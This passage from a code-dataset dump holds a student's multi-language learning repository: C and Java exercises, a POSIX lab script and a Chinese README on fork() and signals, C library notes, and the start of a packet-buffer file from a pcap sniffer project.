select_problem() {\r\n int k = 1<<30;\r\n while(k--) {\r\n k = k;\r\n }\r\n}\r\n\r\nint main() {\r\n check_time(select_problem);\r\n return 0; \r\n}" }, { "alpha_fraction": 0.34705883264541626, "alphanum_fraction": 0.4117647111415863, "avg_line_length": 20.25, "blob_id": "9c62376928bb913a3ff20e108c12898edf4f3944", "content_id": "8cd4fa8a648bd8fbf0582b6887bca5173871fb06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 340, "license_type": "permissive", "max_line_length": 48, "num_lines": 16, "path": "/c/hardwork/hardway/char_and_char_pointer.c", "repo_name": "jskyzero/Languages", 
"src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n char* p1[4][4] = {\"abc\", \"def\", \"efg\", \"hij\"};\n printf(\"%s\\n\", p1[0]);\n printf(\"%c\\n\", *(p1[1] + 1));\n\n char*(p2[4]) = {\"abc\", \"def\", \"efg\", \"hij\"};\n printf(\"%s\\n\", p2[0]);\n printf(\"%c\\n\", *(p2[1] + 1));\n\n int a[4] = {1, 2, 3, 4};\n char(*p3)[4] = a;\n printf(\"%d\\n\", *a++);\n printf(\"%d\\n\", *a);\n}\n" }, { "alpha_fraction": 0.4653061330318451, "alphanum_fraction": 0.4938775599002838, "avg_line_length": 17.923076629638672, "blob_id": "e97c094487d021416960516b591d6dd3bb7a79b3", "content_id": "2cd4175a8990e891cc2497dc5ab7366c3cb8bba0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 245, "license_type": "permissive", "max_line_length": 42, "num_lines": 13, "path": "/java/projects/algorithms/chapter1/part1/Q8.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q8\n */\npublic class Q8 {\n public static void main(String[] args) {\n TestCodes.test(() -> {\n System.out.print('b');\n System.out.print('b' + 'c');\n System.out.print((char)('a' + 4));\n return 0;\n }, \"b197e\");\n }\n}" }, { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.7251655459403992, "avg_line_length": 42.28571319580078, "blob_id": "86eb482e6dac206cccaa81bab1542df435baf6d8", "content_id": "d8f7f501a2485b4bc01be0075b89d937cab399ec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 302, "license_type": "permissive", "max_line_length": 81, "num_lines": 7, "path": "/c/projects/POSIX/Lab2/2.2.test.sh", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "python2.7 2.2.produce_data.py\ngcc 2.2.matrix.c -o matrix -pthread\n./matrix > 2.2.ans\n# if #define READ_TEST 1 and comment ANS_TEST then uncomment data and comment ans\n# diff --strip-trailing-cr 2.2.ans 2.2.data.csv\ndiff --strip-trailing-cr 2.2.ans 
2.2.ans.csv\nrm matrix 2.2.ans 2.2.data.csv 2.2.ans.csv" }, { "alpha_fraction": 0.4659949541091919, "alphanum_fraction": 0.508816123008728, "avg_line_length": 14.920000076293945, "blob_id": "b9711e4922f3a536d75a00b23dfdea84d4e8edec", "content_id": "9ef3e32a333579166b12cf3949c28cceda96723b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 397, "license_type": "permissive", "max_line_length": 44, "num_lines": 25, "path": "/java/hardwork/swing/Simple.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import javax.swing.*; // for swing \n\npublic class Simple\n{\n private JFrame f;\n\n Simple ()\n {\n f = new JFrame();\n\n JButton b = new JButton(\"click\");\n b.setBounds(130, 100, 100, 40);\n\n f.add(b);\n\n f.setSize(400, 500);\n f.setLayout(null);\n f.setVisible(true);\n }\n\n\n public static void main(String[] args) {\n new Simple();\n }\n}" }, { "alpha_fraction": 0.6081657409667969, "alphanum_fraction": 0.6179159283638, "avg_line_length": 22.1126766204834, "blob_id": "1fe12e996f5fc4b14e89087b4f87888adc1cbf6b", "content_id": "9b66316b5201a2b1a37487e58cf0751847f1fb40", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1641, "license_type": "permissive", "max_line_length": 65, "num_lines": 71, "path": "/c/projects/POSIX/Lab3/3.0.semaphore.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * jskyzero 2017(R) in SYSU\n * learn to use semaphore\n */\n\n#include <pthread.h>\n#include <semaphore.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define BUFF_SIZE 3\n\nint nitems;\ntypedef struct sto {\n int buffer[BUFF_SIZE];\n sem_t mutex, nempty, nstored;\n} sto_type;\nsto_type shared;\n\nvoid *produce(void *);\nvoid *consume(void *);\n\nint main(int argc, char **argv) {\n if (argc != 2) {\n printf(\"Usage: prodcons number\\n\");\n exit(0);\n }\n pthread_t tid_produce, 
tid_consumer;\n nitems = atoi(argv[1]);\n sem_init(&shared.mutex, 0, 1);\n sem_init(&shared.nempty, 0, BUFF_SIZE);\n sem_init(&shared.nstored, 0, 0);\n pthread_create(&tid_produce, NULL, produce, NULL);\n pthread_create(&tid_consumer, NULL, consume, NULL);\n pthread_join(tid_produce, NULL);\n pthread_join(tid_consumer, NULL);\n sem_destroy(&shared.mutex);\n sem_destroy(&shared.nempty);\n sem_destroy(&shared.nstored);\n exit(0);\n}\n\nvoid *produce(void *arg) {\n int i;\n for (i = 0; i < nitems; i++) {\n sem_wait(&shared.nempty);\n sem_wait(&shared.mutex);\n shared.buffer[i % BUFF_SIZE] = i;\n printf(\"%s %d\\n\", \"Product\", shared.buffer[i % BUFF_SIZE]);\n sem_post(&shared.mutex);\n sem_post(&shared.nstored);\n }\n return (NULL);\n}\n\nvoid *consume(void *arg) {\n int i;\n for (i = 0; i < nitems; i++) {\n sem_wait(&shared.nstored);\n sem_wait(&shared.mutex);\n if (shared.buffer[i % BUFF_SIZE] != i) {\n printf(\"buffer[%d] %d\\n\", i, shared.buffer[i % BUFF_SIZE]);\n } else {\n printf(\"Consumer: %d\\n\", shared.buffer[i % BUFF_SIZE]);\n }\n sem_post(&shared.mutex);\n sem_post(&shared.nempty);\n }\n return (NULL);\n}\n" }, { "alpha_fraction": 0.44337812066078186, "alphanum_fraction": 0.5105566382408142, "avg_line_length": 23.85714340209961, "blob_id": "00cf3ed97dc946faf338a7a2b5292ceea69cd5f7", "content_id": "c0905ea6952e2adf7698e25a6ef29ffbab8350dd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 521, "license_type": "permissive", "max_line_length": 60, "num_lines": 21, "path": "/java/projects/algorithms/chapter1/part1/Q33.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q33\n */\npublic class Q33 {\n public static void main(String[] args) {\n double[][] A = {{1, 2}, {3, 4}, {5, 6}};\n double[][] B = {{7,8}, {9, 10}};\n\n double[] a = {1, 2, 3};\n double[] b = {4, 5};\n\n System.out.printf(\"a * b = %5f\\n\", Q33Matrix.dot(a, b));\n System.out.printf(\"A * B = 
\\n\");\n Q33Matrix.print(Q33Matrix.mult(A, B));\n System.out.printf(\"A * a = \\n\");\n Q33Matrix.print(Q33Matrix.mult(A, a));\n System.out.printf(\"a * A = \\n\");\n Q33Matrix.print(Q33Matrix.mult(a, A));\n\n }\n}" }, { "alpha_fraction": 0.60317462682724, "alphanum_fraction": 0.60317462682724, "avg_line_length": 30.5, "blob_id": "dbdf4234b99064d96b979f0d43afad82a42390f5", "content_id": "b6781fae383e0da4470cfcf1186b881c8d029f9b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 63, "license_type": "permissive", "max_line_length": 43, "num_lines": 2, "path": "/c/hardwork/hardway/void_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main() { printf(\"%ld\", sizeof(void)); }\n" }, { "alpha_fraction": 0.5990888476371765, "alphanum_fraction": 0.6203492879867554, "avg_line_length": 28.266666412353516, "blob_id": "4a2a81056323e67f14db1526c8a442c74e9b1aab", "content_id": "cc673ec686227b82707313400069eb9bc9e91617", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1317, "license_type": "permissive", "max_line_length": 64, "num_lines": 45, "path": "/java/hardwork/swing/Try1.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import javax.swing.*; // for swing\nimport java.awt.event.*;\n\npublic class Try1 implements WindowListener, ActionListener\n{\n private JFrame PageFrame;\n JTextField Text;\n private int ClickTimes;\n Try1 ()\n {\n PageFrame = new JFrame();\n \n JButton ClickButton = new JButton(\"Click\");\n ClickButton.setBounds(0, 0, 100, 100);\n ClickButton.addActionListener(this);\n\n Text = new JTextField();\n Text.setBounds(100,0,400,100);\n\n PageFrame.add(ClickButton);\n PageFrame.add(Text);\n PageFrame.setSize(500, 200);\n PageFrame.setLayout(null);\n PageFrame.setVisible(true);\n }\n public void actionPerformed(ActionEvent e) {\n ClickTimes++;\n 
Text.setText(\"Button Clicked \" + ClickTimes + \" times\");\n }\n\n\n public void windowClosing(WindowEvent e) {\n PageFrame.dispose();\n System.exit(0);\n }\n public void windowOpened(WindowEvent e) {}\n public void windowActivated(WindowEvent e) {}\n public void windowIconified(WindowEvent e) {}\n public void windowDeiconified(WindowEvent e) {}\n public void windowDeactivated(WindowEvent e) {}\n public void windowClosed(WindowEvent e) {}\n public static void main(String[] args) {\n new Try1();\n }\n}\n" }, { "alpha_fraction": 0.47337278723716736, "alphanum_fraction": 0.5514792799949646, "avg_line_length": 12.412698745727539, "blob_id": "3f5adf3ae97c537186a9d84ed3be13820c1c1b03", "content_id": "7e3b9feed2d0c51ca24c5813826cdf6e44b9b7e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 845, "license_type": "permissive", "max_line_length": 34, "num_lines": 63, "path": "/c/hardwork/hardway/money.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n\nlong f05(float n) {\n\tint N=n/0.5;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=1;\n\treturn ans;\n}\nlong f1(float n) {\n\tint N=n/1;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f05(n-1*i);\n\treturn ans;\n}\nlong f5(float n) {\n\tint N=n/5;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f1(n-5*i);\n\treturn ans;\n}\nlong f10(float n) {\n\tint N=n/10;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f5(n-10*i);\n\treturn ans;\n}\nlong f20(float n) {\n\tint N=n/20;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f10(n-20*i);\n\treturn ans;\n}\nlong f50(float n) {\n\tint N=n/50;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f20(n-50*i);\n\treturn ans;\n}\nlong f100(float n) {\n\tint N=n/100;\n\tlong ans=0;\n\tfor(int i=0;i<=N;i++)\n\tans+=f50(n-100*i);\n\treturn ans;\n}\n\n\n\n\nint main() {\n\tfloat n;\n\twhile(scanf(\"%f\",&n)!=EOF){\n\t\t\tprintf(\"%ld\\n\",f100(n));\n\t}\n\t\n\treturn 0;\n}\n" 
}, { "alpha_fraction": 0.30612245202064514, "alphanum_fraction": 0.3877550959587097, "avg_line_length": 15.333333015441895, "blob_id": "73e520c24f9236b2294310ec1b916323eb4b9f06", "content_id": "0011a42f309bf8f81798cb73c723d6c506661b82", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 147, "license_type": "permissive", "max_line_length": 33, "num_lines": 9, "path": "/c/hardwork/hardway/two_dimension_array.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint a[3][2] = {1, 2, 3, 4, 5, 6};\n\nint main() {\n int* p = a[0];\n for (p; p < a[0] + 6; p++) {\n printf(\"%d\\n\", p[0]);\n }\n}\n" }, { "alpha_fraction": 0.371048241853714, "alphanum_fraction": 0.40599000453948975, "avg_line_length": 17.78125, "blob_id": "d294054434da044cf99519d64cafa83c8c3310a6", "content_id": "9f9a311ee10f37863fe58caf8dd2e3620ace2c6c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 601, "license_type": "permissive", "max_line_length": 62, "num_lines": 32, "path": "/c/hardwork/hardway/read_and_print.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() prinf()\n\nint a[1005];\nint main() {\n int N, n, i, j;\n // OK now I know memset and global vlaue is initial valued 0\n for (j = 1; j; j++) {\n for (i = 0; i <= 1000; i++) {\n a[i] = 0;\n }\n\n // Now I will use while loop\n scanf(\"%d\", &N);\n if (0 == N)\n break;\n else\n for (i = 0; i < N; i++) {\n scanf(\"%d\", &n);\n a[n]++;\n }\n\n // print ans part\n printf(\"Case %d:\\n\", j);\n for (i = 0; i <= 1000; i++) {\n if (0 == a[i])\n continue;\n else\n printf(\"%d %d\\n\", i, a[i]);\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.47826087474823, "alphanum_fraction": 0.48695650696754456, "avg_line_length": 13.375, "blob_id": "07ba1c2e26eae315ec938b69f367279770661b12", "content_id": "c99f564833dbee556e511ec55d85cc670adae7f3", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 115, "license_type": "permissive", "max_line_length": 23, "num_lines": 8, "path": "/c/hardwork/hardway/register.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nvoid m();\nint main() {\n register int x = 5;\n m();\n printf(\"x is %d\", x);\n}\nvoid m() { x++; }\n" }, { "alpha_fraction": 0.5672884583473206, "alphanum_fraction": 0.6172551512718201, "avg_line_length": 18.37419319152832, "blob_id": "f505fa570b42046f7405be74bb92b0556e25f25d", "content_id": "6bdafe062ae504863125b26a2968386f50dc7de4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4710, "license_type": "permissive", "max_line_length": 128, "num_lines": 155, "path": "/c/projects/POSIX/Lab1/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# 实验1 进程和进程通信\n> DDL: 2017/04/10 24:00\n\n## 进程的创建实验\n1. 编译运行如下程序并解释现象\n```C\n#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n printf(\"**1**\\n\");\n\n int pid_2 = fork();\n printf(\"**2**\\n\");\n\n if (pid_1 == 0) {\n int pid_3 = fork();\n printf(\"**3**\\n\");\n } else {\n printf(\"**4**\\n\");\n }\n return 0;\n}\n```\n现象:能看到2个1,4个2,2个4,4个3,如下\n解释:程序一共有3次fork(),正常将产生6个子进程,第一次fork(),两个进程都将会输出1,第二次fork(),四个进程都将会输出2,第三次fork()仅对第一次的子进程(经过第二次fork()有两个),产生四个进程,输出四个3,余下两个将会输出4。\n```\n**1**\n**1**\n**2**\n**4**\n**2**\n**4**\n**2**\nbash-3.2$ **2**\n**3**\n**3**\n**3**\n**3**\n```\n\n2. 
编写一段程序,使用系统调用fork()创建两个子进程。当此程序运行时,在系统中有一个父进程和两个子进程活动。让每一个进程在屏幕上显示一个字符;父进程显示字符“a”;子进程分别显示字符“b”和字符“c”。试观察记录屏幕上的显示结果,并分析原因。\n\n```C\n#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n if (pid_1 != 0) {\n int pid_2 = fork();\n if (pid_2 != 0) {\n puts(\"a\");\n } else {\n puts(\"c\"); // second sub process print \"c\"\n }\n } else {\n puts(\"b\"); // first sub process print \"b\"\n }\n}\n```\n输出如下:\n原因:第一次fork(),通过返回值判断,父进程将继续fork(),子进程就会输出`b\\n`,同理通过又一次fork(),父进程和第二个子进程分别输出`a\\n`和`c\\n`。\n```\nb\na\nc\n```\n\n3. 下面程序将在屏幕上输出的字符‘X’、数字“1” 和“0”各多少个?为什么?\n```C\n#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void) {\n int i, a = 0;\n pid_t pid;\n if ((pid = fork())) a = 1;\n for (i = 0; i < 2; i++) {\n printf(\"X\");\n }\n if (pid == 0) printf(\"%d\\n\", a);\n return 0;\n}\n// XXXX0\n```\n输出:`XXXX0`\n解释:一次fork(),两个进程,两个都会循环输出两个X,共计四个X,父进程a被置1,但是仅当检测到为子进程的时候才会输出,于是只有一次a的初始值0.\n\n4. 如果将上面main函数修改如下,则屏幕上输出的字符‘X’、数字“1”和“0”各多少个?为什么?\n```C\n#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void) {\n int i, a = 0;\n pid_t pid[2];\n for (i = 0; i < 2; i++) {\n if ((pid[i] = fork())) a = 1;\n // fork();\n printf(\"X\");\n }\n if (pid[0] == 0) printf(\"%d\\n\", a);\n if (pid[1] == 0) printf(\"%d\\n\", a);\n return 0;\n} \n```\n输出:\n```\nXXXX1\nXX1\nbash-3.2$ XX0\n0\n```\n原因:最开始分析的时候我认为是六个,如果我们修改输出`X`为`X\\n`看到的就是只有6个,8个是因为复制的时候连输出缓存一起复制了,下面解释6个原因。\n循环内部第一次fork(),输出两个X,父进程的a置1,对于这两个进程有(pid[0],pid[1], a)={(+, ?, 1), (0, ? 
, 0)}\n第二次fork(),变为四个进程,输出四个X,原来的两个进程的a置1,共计六个X,\n对于现在这四个进程有(pid[0],pid[1], a)={{(+, +, 1), (+, 0, 1)}, {(0, 1 , 1), (0, 0, 0)}}\n对于输出a,我们可以发现只要一个pid为0就会输出一次,共计四次,两个1两个0.\n\n## 信号处理实验\n(a) 参考2.1.c\n(b) 参考2.2.c\n执行结果:\n`Ctrl-\\`和`Ctrl-C`键入不再有效\n分析原因:\n加了忽略这俩信号的语句。\n\n注1:最开始我没有看到给的例子程序,整个程序都是自己手动写的,所以语句加入的位置和老师希望考察的不一样。\n注2:据wikipedia,Ctrl-C发送INT信号(SIGINT),Ctrl-\\发送QUIT信号(SIGQUIT),这与实验指导上的描述不符。\n\n## 进程间共享内存实验\n> 完成课本第三章的练习3.10的程序\n\n参考3.1.c\n\n## 实现shell的要求\n> 完成课本上第三章的项目:实现shell。除此之外满足下面要求:在shell下,按ctrl+C时不会终止shell;\n\n参考4.1.c\n\n注1:编写环境为macOS,以下为gcc -v输出,由于在bash on windows上连编译都会报错(关于头文件和写法警告)所以思考了一下还是把环境贴出来。\n```shell\n~/workspace/Study/C-Study$ gcc -v\nConfigured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-inc\nlude-dir=/usr/include/c++/4.2.1\nApple LLVM version 8.0.0 (clang-800.0.42.1)\nTarget: x86_64-apple-darwin16.3.0\nThread model: posix\nInstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctool\nchain/usr/bin\n```" }, { "alpha_fraction": 0.39316239953041077, "alphanum_fraction": 0.39316239953041077, "avg_line_length": 18, "blob_id": "0f4cfb0afce50feca817ecd8637a6853ca3874b6", "content_id": "1d577969942ed9ddf7b3cd37e7ffbaae39e602fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 117, "license_type": "permissive", "max_line_length": 35, "num_lines": 6, "path": "/c/hardwork/hardway/define_#.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": " #include <stdio.h>\n\t #define foo(m, n) #x #y\n\t int main()\n\t {\n\t printf(\"%s\\n\", foo(k, l));\n\t }\n\n" }, { "alpha_fraction": 0.5959193110466003, "alphanum_fraction": 0.6027204394340515, "avg_line_length": 18.116592407226562, "blob_id": "19912ae7861e72eae3422c4c167f3d263d2ee30d", "content_id": "51006687aab3ffd99c6cfc30edf570a6fb35c69e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4315, "license_type": 
"permissive", "max_line_length": 222, "num_lines": 223, "path": "/c/docs/C-Library.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "C标准函数库简介\n\n# C library\n\n[TOC]\n\n## C90\n\n\n\n## assert.h C Diagnostics Library \n\n```C\nvoid assert (int expression);\n```\n\n## ctype.h Character handling functions \n\n```c\nint isdigit ( int c );\nint islower ( int c );\nint toupper ( int c );\n```\n\n## errno.h C Errors \n\n[**errno**](http://www.cplusplus.com/reference/cerrno/errno/) Last error number (macro )\n\n## float.h Characteristics of floating-point types \n\nFLT_MAX DBL_MAX LDBL_MAX \n\nFLT_EPSILON DBL_EPSILON LDBL_EPSILON\n\n## iso646.h\n\n| macro | operator |\n| ------ | -------- |\n| and | && |\n| and_eq | &= |\n| bitand | & |\n| bitor | \\| |\n| compl | ~ |\n| not | ! |\n| not_eq | != |\n| or | \\|\\| |\n| or_eq | \\|= |\n| xor | ^ |\n| xor_eq | ^= |\n\n| FLT_MAX  DBL_MAX  LDBL_MAX | `1E+37` or greater `1E+37` or greater `1E+37` or greater | MAXimum | Maximum finite representable floating-point number. |\n| -------------------------------------- | ---------------------------------------- | ------- | ---------------------------------------- |\n| FLT_EPSILON  DBL_EPSILON  LDBL_EPSILON | `1E-5` or smaller `1E-9` or smaller `1E-9` or smaller | | Difference between 1 and the least value greater than 1 that is representable. 
|\n\n## limits.h\n\nCHAR_BIT INT_MAX LLONG_MIN\n\n## locale.h\n\n[**struct lconv**](http://www.cplusplus.com/reference/clocale/lconv/) [**setlocale**](http://www.cplusplus.com/reference/clocale/setlocale/) [**localeconv**](http://www.cplusplus.com/reference/clocale/localeconv/) \n\n## math.h\n\ncos, acos , cosh\n\nlog, log10\n\npow sqrt\n\nceil floor\n\nabs\n\n## setjmp.h\n\n```c\n/* longjmp example */\n#include <stdio.h> /* printf */\n#include <setjmp.h> /* jmp_buf, setjmp, longjmp */\n\n\n\nmain()\n{\n jmp_buf env;\n int val;\n\n val=setjmp(env);\n\n printf (\"val is %d\\n\",val);\n\n if (!val) longjmp(env, 1);\n\n return 0;\n}\n```\n\n## signal.h\n\n`Some running environments use *signals* to inform running processes of certain events.`\n\n```c\n/* signal example */\n#include <stdio.h> /* printf */\n#include <signal.h> /* signal, raise, sig_atomic_t */\n\n\n\nsig_atomic_t signaled = 0;\n\nvoid my_handler (int param)\n{\n signaled = 1;\n}\n\nint main ()\n{\n void (*prev_handler)(int);\n\n prev_handler = signal (SIGINT, my_handler);\n\n /* ... */\n raise(SIGINT);\n /* ... 
*/\n \n printf (\"signaled is %d.\\n\",signaled);\n \n\n return 0;\n}\n```\n\n## stdarg.h\n\n- [**va_start**](http://www.cplusplus.com/reference/cstdarg/va_start/)\n\n Initialize a variable argument list (macro )\n\n\n- [**va_arg**](http://www.cplusplus.com/reference/cstdarg/va_arg/)\n\n Retrieve next argument (macro )\n\n\n- [**va_end**](http://www.cplusplus.com/reference/cstdarg/va_end/)\n\n End using variable argument list (macro )\n\n\n- [**va_copy **](http://www.cplusplus.com/reference/cstdarg/va_copy/)\n\n Copy variable argument list (macro )\n\n## stddef.h\n\n- [**ptrdiff_t**](http://www.cplusplus.com/reference/cstddef/ptrdiff_t/)\n\n Result of pointer subtraction (type )\n\n\n- [**size_t**](http://www.cplusplus.com/reference/cstddef/size_t/)\n\n Unsigned integral type (type )\n\n## stdio.h\n\n## stdlib.h\n\n## string.h\n\n## time.h\n\n#### Time manipulation\n\n- [**clock**](http://www.cplusplus.com/reference/ctime/clock/)\n\n Clock program (function )\n\n\n- [**difftime**](http://www.cplusplus.com/reference/ctime/difftime/)\n\n Return difference between two times (function )\n\n\n- [**mktime**](http://www.cplusplus.com/reference/ctime/mktime/)\n\n Convert tm structure to time_t (function )\n\n\n- [**time**](http://www.cplusplus.com/reference/ctime/time/)\n\n Get current time (function )\n\n#### Conversion\n\n- [**asctime**](http://www.cplusplus.com/reference/ctime/asctime/)\n\n Convert tm structure to string (function )\n\n\n- [**ctime**](http://www.cplusplus.com/reference/ctime/ctime/)\n\n Convert time_t value to string (function )\n\n\n- [**gmtime**](http://www.cplusplus.com/reference/ctime/gmtime/)\n\n Convert time_t to tm as UTC time (function )\n\n\n- [**localtime**](http://www.cplusplus.com/reference/ctime/localtime/)\n\n Convert time_t to tm as local time (function )\n\n\n- [**strftime**](http://www.cplusplus.com/reference/ctime/strftime/)\n\n Format time as string (function )\n\n## 
Reference\n\n[cplusplus.com](http://www.cplusplus.com/reference/clibrary/)\n\n" }, { "alpha_fraction": 0.5110132098197937, "alphanum_fraction": 0.5462555289268494, "avg_line_length": 19.636363983154297, "blob_id": "3624e0061f92c727232951124cfb93a364e6b909", "content_id": "90603d3f10739d15e955bf22fe868986a4712c13", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 227, "license_type": "permissive", "max_line_length": 35, "num_lines": 11, "path": "/c/hardwork/hardway/strchr.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <string.h> // for strchr()\n#include <math.h> // for pow()\nchar a[10] = \"abcdefghi\";\n\nint main() {\n char* p = strchr(a, 'c');\n printf(\"%s\", p);\n\n printf(\"%lf\", pow(128, 8) / 60);\n}\n" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.4933333396911621, "avg_line_length": 9.857142448425293, "blob_id": "26897e5cede296fc2f047d431ba84e361499116b", "content_id": "d6d7803febdd59e99a75aa0ef613068d71aec85e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 75, "license_type": "permissive", "max_line_length": 24, "num_lines": 7, "path": "/R/harwork/hardway/function.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Function\n\nprint_x <- function(x) {\n cat(\"x =\", x, \"\\n\")\n}\n\nprint_x(\"12\")" }, { "alpha_fraction": 0.4231884181499481, "alphanum_fraction": 0.46666666865348816, "avg_line_length": 15.428571701049805, "blob_id": "0039bb143508fbf080fe6b990b9866b9185d7132", "content_id": "15f380fd2cfcd146a8dc5a9b351ad7aea367fcf8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 345, "license_type": "permissive", "max_line_length": 42, "num_lines": 21, "path": "/c/hardwork/hardway/rabbits_recall_func_itself.c", "repo_name": "jskyzero/Languages", "src_encoding": 
"UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n\nlong long f(long long n) {\n if (n == 0)\n return 1;\n else if (n == 1)\n return 1;\n else if (n == 2)\n return 2;\n else\n return (f(n - 1) + f(n - 2));\n}\n\nint main() {\n long long n;\n scanf(\"%lld\", &n);\n if (n > 20) n = n % 21;\n if (0 == n) n = 1;\n printf(\"%lld\\n\", f(n));\n return 0;\n}\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.5263158082962036, "avg_line_length": 9.307692527770996, "blob_id": "d5599960b652ddaffd98517167bda9597fda81a2", "content_id": "ec143f1f5542b26af4a4ae1afd22558a29785d9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 133, "license_type": "permissive", "max_line_length": 41, "num_lines": 13, "path": "/cplusplus/hardwork/C++17/helloworld.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <iostream>\n\n\n// todo \n// learn more about C++\n\nauto f() {\n std::cout << \"hellworld!\" << std::endl;\n}\n\nint main() {\n f();\n}" }, { "alpha_fraction": 0.6056414842605591, "alphanum_fraction": 0.6100090742111206, "avg_line_length": 28.074073791503906, "blob_id": "c707750d7808bedf0d158148b74f2b114fa13811", "content_id": "9ffcb0773a16272d50dcdf039c134e08d03b8c10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5495, "license_type": "permissive", "max_line_length": 80, "num_lines": 189, "path": "/c/projects/sniff/buffer.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <buffer.h>\n/* this file has nothing to do with pcap and sniffing so you can skip reading\n * this so not a lot of comments here, most things are straight forward. 
this\n * basically implements a very simple memory buffer to store all the packets we\n * collect.\n */\n\n/* do some sanity checks and initialize the buffer */\nint create_buffer(buffer* buf, long long int capacity, long long garbage) {\n if (buf == NULL) return -1;\n\n buf->items = 0;\n buf->garbage_size = (garbage <= 0) ? GARBAGE_SIZE : garbage;\n buf->capacity = (capacity <= 0) ? DEFAULT_CAPACITY : capacity;\n buf->header = NULL;\n buf->tail = NULL;\n\n return 0;\n}\n\n/* append the packet to the buffer avoid sanity checks, we want to be done\n * quickly here */\nint append_item(buffer* buf, const struct pcap_pkthdr* packet_header,\n const u_char* full_packet) {\n item* tmp;\n\n#ifdef DEBUG\n /* if already full run garbage collector and see */\n if (buf->items >= buf->capacity) {\n gc(buf);\n if (buf->items >= buf->capacity) return -1;\n }\n#endif\n\n /* first item */\n if (buf->items == 0) {\n /* allocate space for new item */\n if ((tmp = (item*)malloc(sizeof(item))) == NULL) {\n fprintf(stderr, \"could not allocate memory for an item\\n\");\n exit(-1);\n }\n\n /* allocate space for packet header and set it */\n if ((tmp->packet_header =\n (struct pcap_pkthdr*)malloc(sizeof(struct pcap_pkthdr))) == NULL) {\n fprintf(stderr, \"could not allocate memory for packet header\\n\");\n exit(-1);\n }\n memcpy(tmp->packet_header, packet_header, sizeof(struct pcap_pkthdr));\n\n /* allocate space for full packet and set it */\n if ((tmp->full_packet = (u_char*)malloc((packet_header->caplen))) == NULL) {\n fprintf(stderr, \"could not allocate memory for full packet\\n\");\n exit(-1);\n }\n 